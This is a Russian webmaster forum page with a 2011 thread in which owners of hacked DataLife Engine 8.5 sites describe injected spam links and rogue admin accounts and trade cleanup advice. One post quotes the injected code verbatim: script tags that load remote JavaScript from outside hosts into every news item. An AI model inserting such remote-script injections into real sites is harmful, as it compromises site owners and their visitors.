- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
pq777pq, читать, думать, анализировать
Отлично сделал бекап б.д., теперь залатаем дырочки
Здраствуйте уважаемые форумчане!
Прошу - помогите плиз!😕
У меня три сайта, все были на ДЛЕ 8.5 и все находятся на одном хостинге
Вчера зашёл на один из-них, и понял что начались серьёзные проблемы.
Проблема в том, что в ниже перечисленных местах, при каждом переходе по закладках - появляются ссылки нескольких сайтов 4 или 5-ти. Ссылка выглядит обычно (<a href=http://ля-ля-ля/ >скачать книги бесплатно без регистрации</a>).
- на сайте между новостями;
- в админке закладка "Настройки системы" (в поле - "Ключивые слова" и "Причина отключения сайта")
- в закладке "Добавить новость" (в поле - "Короткая новость и "Полная новость").
Пытался удалять но они появляются после каждого перехода!😮
При этом вся эта гадость на всех моих сайтах. Все они на дле 8.5.
А и ещё я пробовал ставить на Wordpress - та же самая ситуация.
Прошу подскажите что мне нужно сделать чтобы это всё исправить!!!! Зарание благодарю!
А как такую хрень удалить?
Запрос автозамены его суку не берет
У меня тоже было, что на сайте появлялись левые админы. Все время удалял и банил, но безтолку. Потом поставил упрощенную регистрацию на сайте (без подтверждения почты) и админы пропали.
Но через неделю обнаружил у себя посторонний код в каждой новости да еще и в краткой и полной
<script src="http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script><script src="http://zheenix.msk.ru/f71879559bcfc86dd2ddeb0cf71e135c.js" type="text/javascript"></script><script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>
стал удалять через админку сайта поиск и замена, удалил все кроме такого кода 76403bc14134a2b49668b579a3b33ae6, потому что он разный в каждой новости, а крыжить 40000 тыс новостей в ручную не хотелось. Не успел удалить, как появился другой подобный код, только ссылки были на другой сайт юкоза. И еще заметил, что полная новость не полностью, а лишь тот кусочек что и в краткой новости.
База новостей была размером 150 метров. Попытался открыть вордом, но это было не реально. Пришлось открывать блокнотом с плагинами и по частям копировать в ворд, а там уже через поиск и замену удалять. С ворда копировал в другой файл, который потом открыл через phpadmin и импортировал все обратно. Поставил заплатки. Посмотрим что будет.
psash добавил 10.01.2011 в 12:39
Если кому нужна помощь, помогу за символическую плату в удалении такого говна с новостей
А и ещё я пробовал ставить на Wordpress - та же самая ситуация.
Это как это ? о_О
Если кому нужна помощь, помогу за символическую плату в удалении такого говна с новостей
Интересно, сколько Вы потратите время на базу в 130 000 новостей и размером в 1,03 Гб ?
php/perl + регулярки не отменяли вроде как. Сделать дамп и работать с текст. файлом. Хотя можно и в консоли)
никто не знает как мне помочь?
запросом автозамены я так понял не берет из за символов \"
php/perl + регулярки не отменяли вроде как. Сделать дамп и работать с текст. файлом. Хотя можно и в консоли)
Молодец, что знаешь php и все остальное, хвастаться можешь. А как быть кто не знает?! Работать только с дампом!
psash добавил 10.01.2011 в 15:48
никто не знает как мне помочь?
запросом автозамены я так понял не берет из за символов \"
А где пользуешься автозаменой? На сайте в админке или еще где? Выложи то что нужно убрать!
psash добавил 10.01.2011 в 15:49
Это как это ? о_О
Интересно, сколько Вы потратите время на базу в 130 000 новостей и размером в 1,03 Гб ?
Столько, сколько этого потребуется!
может у вас движок дырявый или старая 8.2 с фиксами..